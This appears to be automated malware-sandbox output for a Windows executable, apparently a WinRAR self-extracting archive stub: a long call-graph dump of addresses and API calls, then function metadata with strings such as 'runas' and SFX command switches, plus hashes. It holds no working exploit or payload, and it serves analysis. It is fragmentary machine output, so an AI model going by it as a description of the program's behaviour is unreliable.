28152->28155 28153->28154 28156 7ff6373940b0 33 API calls 28153->28156 28161->28112 28163->28102 28164->28102 28165->28102 28168->28112 28188 7ff637399be7 28187->28188 28192 7ff637399c83 28188->28192 28195 7ff637399c1b 28188->28195 28196 7ff637399cae 28188->28196 28317 7ff6373a5294 28188->28317 28335 7ff6373adb60 28188->28335 28189 7ff6373c2320 _handle_error 8 API calls 28190 7ff637399c9d 28189->28190 28190->27542 28193 7ff637391fa0 31 API calls 28192->28193 28193->28195 28195->28189 28197 7ff637399cbf 28196->28197 28339 7ff6373ada48 CompareStringW 28196->28339 28197->28192 28199 7ff6373920b0 33 API calls 28197->28199 28199->28192 28266->27536 28315->27590 28316->27590 28318 7ff6373a52d4 28317->28318 28319 7ff6373a5312 __vcrt_InitializeCriticalSectionEx 28318->28319 28324 7ff6373a5339 __vcrt_InitializeCriticalSectionEx 28318->28324 28340 7ff6373b13f4 CompareStringW 28318->28340 28319->28324 28325 7ff6373a5382 __vcrt_InitializeCriticalSectionEx 28319->28325 28341 7ff6373b13f4 CompareStringW 28319->28341 28320 7ff6373c2320 _handle_error 8 API calls 28322 7ff6373a5503 28320->28322 28322->28188 28324->28320 28325->28324 28326 7ff6373a5439 28325->28326 28327 7ff63739129c 33 API calls 28325->28327 28337 7ff6373adb73 28335->28337 28336 7ff6373adb91 28336->28188 28337->28336 28338 7ff6373920b0 33 API calls 28337->28338 28338->28336 28339->28197 28340->28319 28341->28325 28403->27708 28404->27714 28405->27718 28407 7ff6373a87af 28406->28407 28408 7ff6373a87df 28406->28408 28409 7ff6373c236c 108 API calls 28407->28409 28410 7ff6373c236c 108 API calls 28408->28410 28419 7ff6373a882b 28408->28419 28412 7ff6373a87ca 28409->28412 28413 7ff6373a8814 28410->28413 28415 7ff6373c236c 108 API calls 28412->28415 28416 7ff6373c236c 108 API calls 28413->28416 28414 7ff6373a8845 28417 7ff6373a461c 108 API calls 28414->28417 28415->28408 28416->28419 28418 7ff6373a8851 28417->28418 28420 7ff6373a461c 28419->28420 28421 7ff6373a4632 28420->28421 28423 7ff6373a463a 28420->28423 28422 7ff6373ae948 108 API calls 28421->28422 28422->28423 28423->28414 28425 7ff6373a163e 28424->28425 28427 7ff6373a1681 28424->28427 28425->28427 28428 7ff6373a31bc 51 API calls 28425->28428 28426 7ff63739e600 31 API calls 28430 7ff6373a16de 28426->28430 28429 7ff637391fa0 31 API calls 28427->28429 28432 7ff6373a16a0 28427->28432 28428->28425 28429->28427 28433 7ff6373a178d 28430->28433 28434 7ff6373a175b 28430->28434 28431 7ff6373c2320 _handle_error 8 API calls 28435 7ff63739e58a 28431->28435 28432->28426 28436 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28433->28436 28434->28431 28435->27325 28435->27326 28437 7ff6373a1792 28436->28437 28439 7ff6373b84cc 4 API calls 28438->28439 28440 7ff6373b84aa 28439->28440 28441 7ff6373b84b9 28440->28441 28450 7ff6373b8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28440->28450 28441->26678 28441->26679 28443->26680 28444->26690 28446 7ff6373b84de 28445->28446 28447 7ff6373b84e3 28445->28447 28451 7ff6373b8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28446->28451 28447->26690 28449->26693 28450->28441 28451->28447 28452->26714 28454->26743 28455->26759 28456->26766 28458->26771 28460 7ff6373c03e0 28461 7ff6373c041f 28460->28461 28462 7ff6373c0497 28460->28462 28464 7ff6373aaae0 48 API calls 28461->28464 28463 7ff6373aaae0 48 API calls 28462->28463 28465 7ff6373c04ab 28463->28465 28466 7ff6373c0433 28464->28466 28467 7ff6373ada98 48 API calls 28465->28467 28468 7ff6373ada98 48 API calls 28466->28468 28471 7ff6373c0442 BuildCatchObjectHelperInternal 28467->28471 28468->28471 28469 7ff637391fa0 31 API calls 28470 7ff6373c0541 28469->28470 28472 7ff63739250c SetDlgItemTextW 28470->28472 28471->28469 28473 7ff6373c05cc 28471->28473 28484 7ff6373c05c6 28471->28484 28476 7ff6373c0556 SetWindowTextW 28472->28476 28475 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28473->28475 28474 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28474->28473 28477 7ff6373c05d2 28475->28477 28478 7ff6373c056f 28476->28478 28479 7ff6373c059c 28476->28479 28478->28479 28481 7ff6373c05c1 28478->28481 28480 7ff6373c2320 _handle_error 8 API calls 28479->28480 28482 7ff6373c05af 28480->28482 28483 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28481->28483 28483->28484 28484->28474 28485 7ff6373c11cf 28486 7ff6373c1102 28485->28486 28487 7ff6373c1900 _com_raise_error 14 API calls 28486->28487 28488 7ff6373c1141 28487->28488 28489 7ff6373cbf2c 28496 7ff6373cbc34 28489->28496 28501 7ff6373cd440 GetLastError 28496->28501 28499 7ff6373cbc3f 28522 7ff6373cd068 35 API calls abort 28499->28522 28502 7ff6373cd46a 28501->28502 28503 7ff6373cd45d 28501->28503 28524 7ff6373cfa04 15 API calls 2 library calls 28502->28524 28523 7ff6373cf664 6 API calls __vcrt_uninitialize_ptd 28503->28523 28506 7ff6373cd462 28506->28502 28508 7ff6373cd4ab 28506->28508 28507 7ff6373cd479 28509 7ff6373cd481 28507->28509 28525 7ff6373cf6bc 6 API calls __vcrt_uninitialize_ptd 28507->28525 28510 7ff6373cd4b0 SetLastError 28508->28510 28511 7ff6373cd4c6 SetLastError 28508->28511 28514 7ff6373cd90c __free_lconv_mon 15 API calls 28509->28514 28510->28499 28527 7ff6373cd068 35 API calls abort 28511->28527 28517 7ff6373cd488 28514->28517 28515 7ff6373cd498 28515->28509 28518 7ff6373cd49f 28515->28518 28517->28511 28526 7ff6373cd1f0 15 API calls abort 28518->28526 28520 7ff6373cd4a4 28521 7ff6373cd90c __free_lconv_mon 15 API calls 28520->28521 28521->28508 28523->28506 28524->28507 28525->28515 28526->28520 28528 7ff6373c2d6c 28555 7ff6373c27fc 28528->28555 28531 7ff6373c2eb8 28656 7ff6373c3170 7 API calls 2 library calls 28531->28656 28532 7ff6373c2d88 __scrt_acquire_startup_lock 28534 7ff6373c2ec2 28532->28534 28535 7ff6373c2da6 28532->28535 28657 7ff6373c3170 7 API calls 2 library calls 28534->28657 28543 7ff6373c2de8 __scrt_release_startup_lock 28535->28543 28561 7ff6373cce08 28535->28561 28539 7ff6373c2dcb 28541 7ff6373c2ecd abort 28542 7ff6373c2e51 28569 7ff6373c32bc 28542->28569 28543->28542 28653 7ff6373cc050 35 API calls __GSHandlerCheck_EH 28543->28653 28545 7ff6373c2e56 28572 7ff6373ccd20 28545->28572 28658 7ff6373c2fb0 28555->28658 28558 7ff6373c282b __scrt_initialize_crt 28559 7ff6373c2827 28558->28559 28660 7ff6373c51a0 7 API calls 2 library calls 28558->28660 28559->28531 28559->28532 28562 7ff6373cce20 28561->28562 28563 7ff6373c2dc7 28562->28563 28661 7ff6373c2c80 28562->28661 28563->28539 28565 7ff6373ccd90 28563->28565 28566 7ff6373ccdeb 28565->28566 28567 7ff6373ccdcc 28565->28567 28566->28543 28567->28566 28741 7ff637391120 28567->28741 28570 7ff6373c3cf0 memcpy_s 28569->28570 28571 7ff6373c32d3 GetStartupInfoW 28570->28571 28571->28545 28573 7ff6373d0730 48 API calls 28572->28573 28575 7ff6373ccd2f 28573->28575 28574 7ff6373c2e5e 28577 7ff6373c0754 28574->28577 28575->28574 28746 7ff6373d0ac0 35 API calls swprintf 28575->28746 28747 7ff6373adfd0 28577->28747 28580 7ff6373a62dc 35 API calls 28581 7ff6373c079a 28580->28581 28824 7ff6373b946c 28581->28824 28583 7ff6373c07a4 memcpy_s 28829 7ff6373b9a14 28583->28829 28585 7ff6373c0ddc 28588 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28585->28588 28586 7ff6373c096e GetCommandLineW 28590 7ff6373c0980 28586->28590 28591 7ff6373c0b42 28586->28591 28587 7ff6373c0819 28587->28585 28587->28586 28589 7ff6373c0de2 28588->28589 28594 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28589->28594 28595 7ff63739129c 33 API calls 28590->28595 28592 7ff6373a6454 34 API calls 28591->28592 28593 7ff6373c0b51 28592->28593 28598 7ff637391fa0 31 API calls 28593->28598 28602 7ff6373c0b68 BuildCatchObjectHelperInternal 28593->28602 28596 7ff6373c0de8 28594->28596 28597 7ff6373c09a5 28595->28597 28600 7ff6373c1900 _com_raise_error 14 API calls 28596->28600 28870 7ff6373bcad0 102 API calls 3 library calls 28597->28870 28598->28602 28599 7ff637391fa0 31 API calls 28603 7ff6373c0b93 SetEnvironmentVariableW GetLocalTime 28599->28603 28604 7ff6373c0e34 28600->28604 28602->28599 28606 7ff6373a3e28 swprintf 46 API calls 28603->28606 28605 7ff6373c09af 28605->28589 28609 7ff6373c09f9 OpenFileMappingW 28605->28609 28610 7ff6373c0adb 28605->28610 28607 7ff6373c0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28606->28607 28839 7ff6373bb014 LoadBitmapW 28607->28839 28612 7ff6373c0ad0 CloseHandle 28609->28612 28613 7ff6373c0a19 MapViewOfFile 28609->28613 28617 7ff63739129c 33 API calls 28610->28617 28612->28591 28613->28612 28615 7ff6373c0a3f UnmapViewOfFile MapViewOfFile 28613->28615 28615->28612 28618 7ff6373c0a71 28615->28618 28616 7ff6373c0c75 28863 7ff6373b67b4 28616->28863 28620 7ff6373c0b00 28617->28620 28871 7ff6373ba190 33 API calls 2 library calls 28618->28871 28875 7ff6373bfd0c 35 API calls 2 library calls 28620->28875 28624 7ff6373c0a81 28872 7ff6373bfd0c 35 API calls 2 library calls 28624->28872 28625 7ff6373b67b4 33 API calls 28629 7ff6373c0c87 DialogBoxParamW 28625->28629 28626 7ff6373c0b0a 28626->28591 28631 7ff6373c0dd7 28626->28631 28628 7ff6373c0a90 28873 7ff6373ab9b4 102 API calls 28628->28873 28636 7ff6373c0cd3 28629->28636 28634 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28631->28634 28632 7ff6373c0aa5 28874 7ff6373abb00 102 API calls 28632->28874 28634->28585 28635 7ff6373c0ab8 28639 7ff6373c0ac7 UnmapViewOfFile 28635->28639 28637 7ff6373c0ce6 Sleep 28636->28637 28638 7ff6373c0cec 28636->28638 28637->28638 28640 7ff6373c0cfa 28638->28640 28876 7ff6373b9f4c 49 API calls 2 library calls 28638->28876 28639->28612 28642 7ff6373c0d06 DeleteObject 28640->28642 28643 7ff6373c0d1f DeleteObject 28642->28643 28646 7ff6373c0d25 28642->28646 28643->28646 28644 7ff6373c0d6d 28866 7ff6373b94e4 28644->28866 28645 7ff6373c0d5b 28877 7ff6373bfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28645->28877 28646->28644 28646->28645 28649 7ff6373c0d60 CloseHandle 28649->28644 28653->28542 28656->28534 28657->28541 28659 7ff6373c281e __scrt_dllmain_crt_thread_attach 28658->28659 28659->28558 28659->28559 28660->28559 28662 7ff6373c2c90 28661->28662 28678 7ff6373cce54 28662->28678 28664 7ff6373c2c9c 28684 7ff6373c2848 28664->28684 28667 7ff6373c2cb4 _RTC_Initialize 28676 7ff6373c2d09 28667->28676 28689 7ff6373c29f8 28667->28689 28668 7ff6373c2d35 28668->28562 28670 7ff6373c2cc9 28692 7ff6373cc2c0 28670->28692 28677 7ff6373c2d25 28676->28677 28721 7ff6373c3170 7 API calls 2 library calls 28676->28721 28677->28562 28679 7ff6373cce65 28678->28679 28681 7ff6373cce6d 28679->28681 28722 7ff6373cd69c 15 API calls abort 28679->28722 28681->28664 28682 7ff6373cce7c 28723 7ff6373c78e4 31 API calls _invalid_parameter_noinfo_noreturn 28682->28723 28685 7ff6373c2859 28684->28685 28688 7ff6373c285e __scrt_acquire_startup_lock 28684->28688 28685->28688 28724 7ff6373c3170 7 API calls 2 library calls 28685->28724 28687 7ff6373c28d2 28688->28667 28725 7ff6373c29bc 28689->28725 28691 7ff6373c2a01 28691->28670 28693 7ff6373cc2f4 28692->28693 28694 7ff6373cc2de 28692->28694 28732 7ff6373d0730 28693->28732 28730 7ff6373cd69c 15 API calls abort 28694->28730 28698 7ff6373cc2e3 28731 7ff6373c78e4 31 API calls _invalid_parameter_noinfo_noreturn 28698->28731 28699 7ff6373cc326 28736 7ff6373cc0a0 35 API calls 28699->28736 28701 7ff6373c2cd5 28701->28676 28720 7ff6373c3480 InitializeSListHead 28701->28720 28703 7ff6373cc350 28737 7ff6373cc25c 15 API calls 2 library calls 28703->28737 28705 7ff6373cc366 28706 7ff6373cc36e 28705->28706 28707 7ff6373cc37f 28705->28707 28738 7ff6373cd69c 15 API calls abort 28706->28738 28739 7ff6373cc0a0 35 API calls 28707->28739 28710 7ff6373cc373 28712 7ff6373cd90c __free_lconv_mon 15 API calls 28710->28712 28711 7ff6373cc39b 28711->28710 28713 7ff6373cc3cb 28711->28713 28715 7ff6373cc3e4 28711->28715 28712->28701 28714 7ff6373cd90c __free_lconv_mon 15 API calls 28713->28714 28716 7ff6373cc3d4 28714->28716 28715->28715 28717 7ff6373cd90c __free_lconv_mon 15 API calls 28715->28717 28718 7ff6373cd90c __free_lconv_mon 15 API calls 28716->28718 28717->28710 28719 7ff6373cc3e0 28718->28719 28719->28701 28721->28668 28722->28682 28723->28681 28724->28687 28726 7ff6373c29d6 28725->28726 28728 7ff6373c29cf 28725->28728 28729 7ff6373ccaa0 34 API calls 28726->28729 28728->28691 28729->28728 28730->28698 28731->28701 28733 7ff6373cc2f9 GetModuleFileNameA 28732->28733 28734 7ff6373d073d 28732->28734 28733->28699 28740 7ff6373d0570 48 API calls 4 library calls 28734->28740 28736->28703 28737->28705 28738->28710 28739->28711 28740->28733 28742 7ff6373991c8 35 API calls 28741->28742 28743 7ff637391130 28742->28743 28744 7ff6373c29bc 34 API calls 28743->28744 28745 7ff6373c2a01 28744->28745 28745->28567 28746->28575 28878 7ff6373c2450 28747->28878 28750 7ff6373ae026 GetProcAddress 28752 7ff6373ae053 GetProcAddress 28750->28752 28753 7ff6373ae03b 28750->28753 28751 7ff6373ae07b 28754 7ff6373ae503 28751->28754 28885 7ff6373cb788 39 API calls 2 library calls 28751->28885 28752->28751 28757 7ff6373ae068 28752->28757 28753->28752 28756 7ff6373a6454 34 API calls 28754->28756 28759 7ff6373ae50c 28756->28759 28757->28751 28758 7ff6373ae3b0 28758->28754 28760 7ff6373ae3ba 28758->28760 28761 7ff6373a7df4 47 API calls 28759->28761 28762 7ff6373a6454 34 API calls 28760->28762 28791 7ff6373ae51a 28761->28791 28763 7ff6373ae3c3 CreateFileW 28762->28763 28764 7ff6373ae4f0 CloseHandle 28763->28764 28765 7ff6373ae403 SetFilePointer 28763->28765 28768 7ff637391fa0 31 API calls 28764->28768 28765->28764 28767 7ff6373ae41c ReadFile 28765->28767 28767->28764 28769 7ff6373ae444 28767->28769 28768->28754 28770 7ff6373ae800 28769->28770 28771 7ff6373ae458 28769->28771 28891 7ff6373c2624 8 API calls 28770->28891 28776 7ff63739129c 33 API calls 28771->28776 28773 7ff6373ae53e CompareStringW 28773->28791 28774 7ff63739129c 33 API calls 28774->28791 28775 7ff6373ae805 28780 7ff6373ae48f 28776->28780 28777 7ff6373a8090 47 API calls 28777->28791 28779 7ff637391fa0 31 API calls 28779->28791 28783 7ff6373ae4db 28780->28783 28886 7ff6373ad0a0 33 API calls 28780->28886 28781 7ff6373ae7c2 28785 7ff637391fa0 31 API calls 28781->28785 28782 7ff6373ae648 28887 7ff6373a7eb0 47 API calls 28782->28887 28787 7ff637391fa0 31 API calls 28783->28787 28790 7ff6373ae7cb 28785->28790 28786 7ff6373a32bc 51 API calls 28786->28791 28792 7ff6373ae4e5 28787->28792 28788 7ff6373ae651 28793 7ff6373a51a4 9 API calls 28788->28793 28789 7ff6373ae5cc 28794 7ff63739129c 33 API calls 28789->28794 28801 7ff6373a8090 47 API calls 28789->28801 28806 7ff637391fa0 31 API calls 28789->28806 28810 7ff6373a32bc 51 API calls 28789->28810 28813 7ff6373ae63a 28789->28813 28795 7ff637391fa0 31 API calls 28790->28795 28791->28773 28791->28774 28791->28777 28791->28779 28791->28786 28791->28789 28880 7ff6373a51a4 28791->28880 28796 7ff637391fa0 31 API calls 28792->28796 28797 7ff6373ae656 28793->28797 28794->28789 28798 7ff6373ae7d5 28795->28798 28796->28764 28799 7ff6373ae661 28797->28799 28800 7ff6373ae706 28797->28800 28802 7ff6373c2320 _handle_error 8 API calls 28798->28802 28812 7ff6373aaae0 48 API calls 28799->28812 28803 7ff6373ada98 48 API calls 28800->28803 28801->28789 28804 7ff6373ae7e4 28802->28804 28805 7ff6373ae74b AllocConsole 28803->28805 28804->28580 28807 7ff6373ae6fb 28805->28807 28808 7ff6373ae755 GetCurrentProcessId AttachConsole 28805->28808 28806->28789 28890 7ff6373919e0 31 API calls _invalid_parameter_noinfo_noreturn 28807->28890 28809 7ff6373ae76c 28808->28809 28817 7ff6373ae778 GetStdHandle WriteConsoleW Sleep FreeConsole 28809->28817 28810->28789 28815 7ff6373ae6a5 28812->28815 28813->28781 28813->28782 28814 7ff6373ae7b9 ExitProcess 28816 7ff6373ada98 48 API calls 28815->28816 28818 7ff6373ae6c3 28816->28818 28817->28807 28819 7ff6373aaae0 48 API calls 28818->28819 28820 7ff6373ae6ce 28819->28820 28888 7ff6373adc2c 33 API calls 28820->28888 28822 7ff6373ae6da 28889 7ff6373919e0 31 API calls _invalid_parameter_noinfo_noreturn 28822->28889 28825 7ff6373add88 28824->28825 28826 7ff6373b9481 OleInitialize 28825->28826 28827 7ff6373b94a7 28826->28827 28828 7ff6373b94cd SHGetMalloc 28827->28828 28828->28583 28830 7ff6373b9a49 28829->28830 28832 7ff6373b9a4e BuildCatchObjectHelperInternal 28829->28832 28831 7ff637391fa0 31 API calls 28830->28831 28831->28832 28833 7ff637391fa0 31 API calls 28832->28833 28835 7ff6373b9a7d BuildCatchObjectHelperInternal 28832->28835 28833->28835 28834 7ff637391fa0 31 API calls 28836 7ff6373b9aac BuildCatchObjectHelperInternal 28834->28836 28835->28834 28835->28836 28837 7ff637391fa0 31 API calls 28836->28837 28838 7ff6373b9adb BuildCatchObjectHelperInternal 28836->28838 28837->28838 28838->28587 28840 7ff6373bb03e 28839->28840 28841 7ff6373bb046 28839->28841 28892 7ff6373b8624 FindResourceExW 28840->28892 28842 7ff6373bb04e GetObjectW 28841->28842 28843 7ff6373bb063 28841->28843 28842->28843 28845 7ff6373b849c 4 API calls 28843->28845 28847 7ff6373bb078 28845->28847 28846 7ff6373bb0ce 28858 7ff6373a98ac 28846->28858 28847->28846 28848 7ff6373bb09e 28847->28848 28849 7ff6373b8624 11 API calls 28847->28849 28907 7ff6373b8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28848->28907 28851 7ff6373bb08a 28849->28851 28851->28848 28853 7ff6373bb092 DeleteObject 28851->28853 28852 7ff6373bb0a7 28854 7ff6373b84cc 4 API calls 28852->28854 28853->28848 28855 7ff6373bb0b2 28854->28855 28908 7ff6373b8df4 16 API calls _handle_error 28855->28908 28857 7ff6373bb0bf DeleteObject 28857->28846 28909 7ff6373a98dc 28858->28909 28860 7ff6373a98ba 28976 7ff6373aa43c GetModuleHandleW FindResourceW 28860->28976 28862 7ff6373a98c2 28862->28616 28864 7ff6373c21d0 33 API calls 28863->28864 28865 7ff6373b67fa 28864->28865 28865->28625 28867 7ff6373b9501 28866->28867 28868 7ff6373b950a OleUninitialize 28867->28868 28869 7ff6373fe330 28868->28869 28870->28605 28871->28624 28872->28628 28873->28632 28874->28635 28875->28626 28876->28640 28877->28649 28879 7ff6373adff4 GetModuleHandleW 28878->28879 28879->28750 28879->28751 28881 7ff6373a51c8 GetVersionExW 28880->28881 28882 7ff6373a51fb 28880->28882 28881->28882 28883 7ff6373c2320 _handle_error 8 API calls 28882->28883 28884 7ff6373a5228 28883->28884 28884->28791 28885->28758 28886->28780 28887->28788 28888->28822 28889->28807 28890->28814 28891->28775 28893 7ff6373b864f SizeofResource 28892->28893 28894 7ff6373b879b 28892->28894 28893->28894 28895 7ff6373b8669 LoadResource 28893->28895 28894->28841 28895->28894 28896 7ff6373b8682 LockResource 28895->28896 28896->28894 28897 7ff6373b8697 GlobalAlloc 28896->28897 28897->28894 28898 7ff6373b86b8 GlobalLock 28897->28898 28899 7ff6373b8792 GlobalFree 28898->28899 28900 7ff6373b86ca BuildCatchObjectHelperInternal 28898->28900 28899->28894 28901 7ff6373b86d8 CreateStreamOnHGlobal 28900->28901 28902 7ff6373b8789 GlobalUnlock 28901->28902 28903 7ff6373b86f6 GdipAlloc 28901->28903 28902->28899 28904 7ff6373b870b 28903->28904 28904->28902 28905 7ff6373b8772 28904->28905 28906 7ff6373b875a GdipCreateHBITMAPFromBitmap 28904->28906 28905->28902 28906->28905 28907->28852 28908->28857 28912 7ff6373a98fe _snwprintf 28909->28912 28910 7ff6373a9973 28986 7ff6373a68b0 48 API calls 28910->28986 28912->28910 28914 7ff6373a9a89 28912->28914 28913 7ff637391fa0 31 API calls 28915 7ff6373a99fd 28913->28915 28914->28915 28918 7ff6373920b0 33 API calls 28914->28918 28920 7ff6373a24c0 54 API calls 28915->28920 28916 7ff6373a997d BuildCatchObjectHelperInternal 28916->28913 28917 7ff6373aa42e 28916->28917 28919 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28917->28919 28918->28915 28921 7ff6373aa434 28919->28921 28922 7ff6373a9a1a 28920->28922 28924 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 28921->28924 28923 7ff6373a9a22 28922->28923 28932 7ff6373a9aad 28922->28932 28925 7ff6373a204c 100 API calls 28923->28925 28927 7ff6373aa43a 28924->28927 28929 7ff6373a9a2b 28925->28929 28926 7ff6373a9b17 28978 7ff6373ca450 28926->28978 28929->28921 28931 7ff6373a9a66 28929->28931 28934 7ff6373c2320 _handle_error 8 API calls 28931->28934 28932->28926 28936 7ff6373a8e58 33 API calls 28932->28936 28933 7ff6373ca450 31 API calls 28947 7ff6373a9b57 __vcrt_InitializeCriticalSectionEx 28933->28947 28935 7ff6373aa40e 28934->28935 28935->28860 28936->28932 28937 7ff6373a9c89 28938 7ff6373a2aa0 101 API calls 28937->28938 28950 7ff6373a9d5c 28937->28950 28941 7ff6373a9ca1 28938->28941 28939 7ff6373a2bb0 101 API calls 28939->28947 28940 7ff6373a28d0 104 API calls 28940->28947 28942 7ff6373a28d0 104 API calls 28941->28942 28941->28950 28948 7ff6373a9cc9 28942->28948 28943 7ff6373a204c 100 API calls 28945 7ff6373aa3f5 28943->28945 28944 7ff6373a2aa0 101 API calls 28944->28947 28946 7ff637391fa0 31 API calls 28945->28946 28946->28931 28947->28937 28947->28939 28947->28940 28947->28944 28947->28950 28948->28950 28970 7ff6373a9cd7 __vcrt_InitializeCriticalSectionEx 28948->28970 28987 7ff6373b0bbc MultiByteToWideChar 28948->28987 28950->28943 28951 7ff6373aa1ec 28964 7ff6373aa2c2 28951->28964 28993 7ff6373ccf90 31 API calls 2 library calls 28951->28993 28953 7ff6373aa157 28953->28951 28990 7ff6373ccf90 31 API calls 2 library calls 28953->28990 28954 7ff6373aa14b 28954->28860 28957 7ff6373aa3a2 28960 7ff6373ca450 31 API calls 28957->28960 28958 7ff6373aa249 28994 7ff6373cb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28958->28994 28959 7ff6373aa2ae 28959->28964 28995 7ff6373a8cd0 33 API calls 2 library calls 28959->28995 28963 7ff6373aa3cb 28960->28963 28961 7ff6373a8e58 33 API calls 28961->28964 28966 7ff6373ca450 31 API calls 28963->28966 28964->28957 28964->28961 28965 7ff6373aa16d 28991 7ff6373cb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28965->28991 28966->28950 28968 7ff6373aa1d8 28968->28951 28992 7ff6373a8cd0 33 API calls 2 library calls 28968->28992 28970->28950 28970->28951 28970->28953 28970->28954 28971 7ff6373aa429 28970->28971 28973 7ff6373b0f68 WideCharToMultiByte 28970->28973 28988 7ff6373aaa88 45 API calls _snwprintf 28970->28988 28989 7ff6373ca270 31 API calls 2 library calls 28970->28989 28996 7ff6373c2624 8 API calls 28971->28996 28973->28970 28977 7ff6373aa468 28976->28977 28977->28862 28979 7ff6373ca47d 28978->28979 28985 7ff6373ca492 28979->28985 28997 7ff6373cd69c 15 API calls abort 28979->28997 28981 7ff6373ca487 28998 7ff6373c78e4 31 API calls _invalid_parameter_noinfo_noreturn 28981->28998 28983 7ff6373c2320 _handle_error 8 API calls 28984 7ff6373a9b37 28983->28984 28984->28933 28985->28983 28986->28916 28987->28970 28988->28970 28989->28970 28990->28965 28991->28968 28992->28951 28993->28958 28994->28959 28995->28964 28996->28917 28997->28981 28998->28985 28999 7ff6373cc438 29000 7ff6373cc451 28999->29000 29009 7ff6373cc44d 28999->29009 29001 7ff6373d0730 48 API calls 29000->29001 29002 7ff6373cc456 29001->29002 29011 7ff6373d0b78 GetEnvironmentStringsW 29002->29011 29005 7ff6373cc463 29008 7ff6373cd90c __free_lconv_mon 15 API calls 29005->29008 29007 7ff6373cc470 29010 7ff6373cd90c __free_lconv_mon 15 API calls 29007->29010 29008->29009 29010->29005 29012 7ff6373d0c4a 29011->29012 29013 7ff6373d0ba6 WideCharToMultiByte 29011->29013 29016 7ff6373d0c54 FreeEnvironmentStringsW 29012->29016 29017 7ff6373cc45b 29012->29017 29013->29012 29015 7ff6373d0c00 29013->29015 29024 7ff6373cd94c 29015->29024 29016->29017 29017->29005 29023 7ff6373cc4a4 31 API calls 4 library calls 29017->29023 29020 7ff6373d0c37 29022 7ff6373cd90c __free_lconv_mon 15 API calls 29020->29022 29021 7ff6373d0c10 WideCharToMultiByte 29021->29020 29022->29012 29023->29007 29025 7ff6373cd997 29024->29025 29030 7ff6373cd95b abort 29024->29030 29031 7ff6373cd69c 15 API calls abort 29025->29031 29027 7ff6373cd97e HeapAlloc 29028 7ff6373cd995 29027->29028 29027->29030 29028->29020 29028->29021 29029 7ff6373cbbc0 abort 2 API calls 29029->29030 29030->29025 29030->29027 29030->29029 29031->29028 29032 7ff6373c154b 29034 7ff6373c14a2 29032->29034 29033 7ff6373c1900 _com_raise_error 14 API calls 29033->29034 29034->29033

                                                                                          Executed Functions

                                                                                          Function 00007FF6373BB190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff637390000_8svMXMXNRn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                                          • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                          • API String ID: 255727823-2702805183
                                                                                          • Opcode ID: fd1327b765be3828c368324082e4329336840963213b892e7af7f095c4632b2e
                                                                                          • Instruction ID: d98a0c1a2c23c085021ccf933d4971852e6a92849c418bdd0bad4218d358e40d
                                                                                          • Opcode Fuzzy Hash: fd1327b765be3828c368324082e4329336840963213b892e7af7f095c4632b2e
                                                                                          • Instruction Fuzzy Hash: 86D29362E1DA8781FA60DB25E8542F963A1FF867C0F804135DA8D977A5EF3CE544E700
                                                                                          Function 00007FF6373BCE88 Relevance: 65.0, APIs: 26, Strings: 10, Instructions: 1963windowfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2038927841.00007FF637391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF637390000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2038910788.00007FF637390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2038973798.00007FF6373D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039033465.00007FF6373F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2039095645.00007FF6373FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
